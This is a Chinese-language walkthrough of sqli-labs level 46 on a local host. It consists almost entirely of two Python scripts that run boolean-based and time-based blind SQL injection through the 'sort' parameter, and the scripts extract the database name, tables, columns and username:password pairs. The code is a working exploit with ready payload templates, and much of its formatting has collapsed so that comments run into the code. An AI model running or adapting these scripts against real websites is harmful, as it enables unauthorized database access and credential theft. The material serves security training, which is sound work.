实践环境基于sqli-lab靶场的第46关进行

bool盲注

代码如下：

import requests
from bs4 import BeautifulSoup# 定义获取用户名的函数，使用 BeautifulSoup 解析 HTML 页面，提取用户名信息
def get_username(resp):soup = BeautifulSoup(resp, 'html.parser')try:# 选择页面中指定位置的元素获取用户名username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].textreturn usernameexcept IndexError:# 若未找到对应元素，返回 Nonereturn None# 定义布尔盲注的通用函数，可用于获取不同类型的信息（数据库名、表名、列名、数据等）
def boolean_blind_injection(query_template):result = ''position = 1while True:left = 32right = 127while left < right:mid = (left + right) // 2# 根据传入的查询模板和当前位置、中间字符值构造注入 URLurl = query_template.format(pos=position, mid=mid)try:# 发送 GET 请求获取页面响应resp = requests.get(url)# 调用 get_username 函数获取用户名username = get_username(resp.text)if username == 'Dumb':# 若用户名是 'Dumb'，说明条件成立，更新左边界left = mid + 1else:# 否则更新右边界right = midexcept requests.RequestException as e:# 处理请求异常print(f"Request error: {e}")breakif left == 32:# 若左边界为 32，说明已经获取完所有信息，退出循环breakresult += chr(left)position += 1print(result)return resultif __name__ == '__main__':# 数据库名注入的查询模板database_query = "http://localhost:8989/Less-46/index.php?sort=if(ascii(substr(database(),{pos},1))>{mid},id,username) -- "# 表名注入的查询模板table_query = "http://localhost:8989/Less-46/index.php?sort=if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{pos},1))>{mid},id,username) -- "# 列名注入的查询模板column_query = "http://localhost:8989/Less-46/index.php?sort=if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{pos},1))>{mid},id,username) -- "# 数据注入的查询模板data_query = "http://localhost:8989/Less-46/index.php?sort=if(ascii(substr((select group_concat(username,':',password) from users),{pos},1))>{mid},id,username) -- "# 调用 boolean_blind_injection 函数进行数据库名注入boolean_blind_injection(database_query)# 调用 boolean_blind_injection 函数进行表名注入# boolean_blind_injection(table_query)# 调用 boolean_blind_injection 函数进行列名注入# boolean_blind_injection(column_query)# 调用 boolean_blind_injection 函数进行数据注入#boolean_blind_injection(data_query)

时间盲注

代码如下:

import requests
import time# 配置参数
SLEEP_TIME = 3  # 每次注入的延时秒数
THRESHOLD = 1.5  # 响应时间判断阈值
TIMEOUT = SLEEP_TIME + 2  # 请求超时时间def time_injection(query_template):result = ""pos = 1session = requests.Session()while True:low, high = 32, 126current_char = Nonewhile low <= high:mid = (low + high) // 2payload = query_template.format(pos=pos,mid=mid,sleep=SLEEP_TIME)try:start = time.time()session.get(payload, timeout=TIMEOUT)cost = time.time() - startif cost > THRESHOLD:  # 条件成立low = mid + 1else:high = mid - 1except requests.exceptions.Timeout:low = mid + 1  # 超时视为条件成立except Exception as e:print(f"请求错误: {e}")break# 检查有效字符if high >= 32 and high <= 126:result += chr(high)print(f"[*] 当前结果: {result}")pos += 1else:breakreturn resultif __name__ == '__main__':# 定义注入模板（注意统一参数顺序）templates = {'数据库': "http://localhost:8989/Less-46/index.php?sort=IF(ASCII(SUBSTR(database(),{pos},1))>{mid},SLEEP({sleep}),0)",'表名': "http://localhost:8989/Less-46/index.php?sort=IF(ASCII(SUBSTR((SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()),{pos},1))>{mid},SLEEP({sleep}),0)",'列名': "http://localhost:8989/Less-46/index.php?sort=IF(ASCII(SUBSTR((SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='users'),{pos},1))>{mid},SLEEP({sleep}),0)",'数据': "http://localhost:8989/Less-46/index.php?sort=IF(ASCII(SUBSTR((SELECT GROUP_CONCAT(username,0x7e,password) FROM users),{pos},1))>{mid},SLEEP({sleep}),0)"}for name, template in templates.items():print(f"\n[+] 正在爆破 {name}...")data = time_injection(template)print(f"[+] {name} 结果: {data}\n")